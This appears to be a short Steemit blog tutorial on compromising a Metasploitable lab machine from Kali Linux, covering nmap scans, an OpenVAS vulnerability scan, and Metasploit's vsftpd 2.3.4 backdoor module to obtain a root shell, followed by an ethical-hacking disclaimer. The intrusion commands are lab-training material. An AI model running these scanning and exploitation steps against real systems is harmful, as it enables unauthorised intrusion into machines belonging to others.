Learn hacking exemple 1

in #hack6 years ago

Hi everyone,

In this article, I want to show you how to hack a machine on the same network as you.

The situation is this one.
You want to infect a machine on the same network and take control of it.

For this we will apply the methodology we learned before (https://steemit.com/hack/@pierlave/learn-hacking-1-00-overview). This is just guidelines, you will adjust it depending on your task!

The environment is this one.
Kali machine ip
Metasploitable machine ip unknown.

1) Reconnaissance phase
Scan the network with Nmap (tool for scanning https://nmap.org/ in Kali by default)
Open a terminal and pass the command (the * means all the ip's from 1 to 255).
nmap -sP 162.168.56.*

The metasploitable has the ip

Scan for the services running.
nmap -sT -v

Scan for the versions running
nmap -sV -v

After you have this information, you can try to exploit some services you know are vulnerable or you can do a vulnerability scan.

OpenVas is a free vulnerability scanner, you can install it by following this tutorial (https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/)

You start a job to scan the ip and it gives you a list of vulnerabilities and the severity.

I chose to exploit ftp vsftpd 2.3.4 on port 21.

2) Gaining access
In this phase, we will use what we learned from the scanning section to exploit the machine.

To exploit, we will use Metasploit (it's installed by default on Kali). We need to start PostgreSQL to make it work.

Open a terminal
service postgresql start

Start Metasploit

Search for an existing exploit for the vulnerability you want to exploit.
search vsftpd 2.3.4

We see an exploit we want to use
use exploit/unix/ftp/vsftpd_234_backdoor

You can see the options for the exploit
show options

Set the remote host to the victim's machine

Send the exploit

The exploit worked, you have now access to the machine.

Pass the command whoami to see what is your privilege level.

You are root! you have now complete control over this machine.

The information provided on hacking is to be used for educational purpose only. The creator is in no way responsible for any misuse of the information provided. All the information provided is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word "Hacking" should be regarded as "Ethical hacking". You implement the information given at your own risk


Coin Marketplace

STEEM 0.26
TRX 0.10
JST 0.032
BTC 41808.92
ETH 2230.51
USDT 1.00
SBD 5.15